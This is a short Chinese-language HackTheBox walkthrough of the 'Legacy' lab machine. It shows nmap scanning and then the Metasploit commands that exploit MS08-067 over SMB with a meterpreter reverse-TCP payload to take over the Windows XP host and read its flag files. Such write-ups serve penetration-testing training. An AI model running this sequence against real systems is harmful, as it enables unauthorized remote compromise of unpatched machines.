HackTheBox-Machines--Legacy

文章目录

  • [1 端口扫描](#1 端口扫描)
  • [2 测试思路](#2 测试思路)
  • [3 445端口漏洞测试](#3 445端口漏洞测试)
  • [4 flag](#4 flag)

Legacy 测试过程


1 端口扫描


bash 复制代码
nmap -sC -sV 10.129.227.181

2 测试思路


**  目标开启了135、139、445端口,445 SMB服务存在很多可利用漏洞,所以测试点先从445端口开始。而且在Nmap扫描结果中,可以看到系统是Windows XP,所以寻找Windows XP相关的SMB漏洞。**


3 445端口漏洞测试


**  1.搜索SMB服务相关漏洞**

bash 复制代码
nmap -p 445 --srcipt vuln 10.129.227.181

**  2.漏洞exploit**

bash 复制代码
search exploit/windows/smb

在输出中存在很多可利用exploit

bash 复制代码
 use exploit/windows/smb/ms08_067_netapi 
 set payload windows/meterpreter/reverse_tcp
 set rhosts 10.129.227.181
 set rport 445
 run

4 flag


bash 复制代码
type C:\Documents and Settings\john\Desktop\user.txt
type  C:\Documents and Settings\Administrator\Desktop\root.txt
相关推荐
马·坚5 个月前
渗透测试基础(四) MS08-067 漏洞攻击
网络·网络安全·渗透测试·ms08-067
0415i5 个月前
Hack The Box-Blurry
pickle·提权·rce·hack the box·clearml·cve-2024-24590
七天啊6 个月前
HackTheBox-Machines--Cronos
sql注入·命令执行·hack the box·计划任务写入shell提权
七天啊1 年前
HackTheBox-Starting Point--Tier 2---Markup
xxe·hack the box·ssh私钥登录·windows权限问题·计划任务反弹shell
七天啊1 年前
HackTheBox-Starting Point--Tier 2---Unified
mongodb·hack the box·jndi注入·cve-2021-44228
七天啊1 年前
HackTheBox-Starting Point--Tier 2---Base
文件上传漏洞·反弹shell·hack the box·find命令
七天啊1 年前
HackTheBox-Starting Point--Tier 1---Funnel
postgresql·hack the box·ssh隧道
7ig3r1 年前
【Kali】vmware虚拟机三种网络连接方式,ms17-010 , ms08_067的复现
linux·kali·ms17-010·ms08-067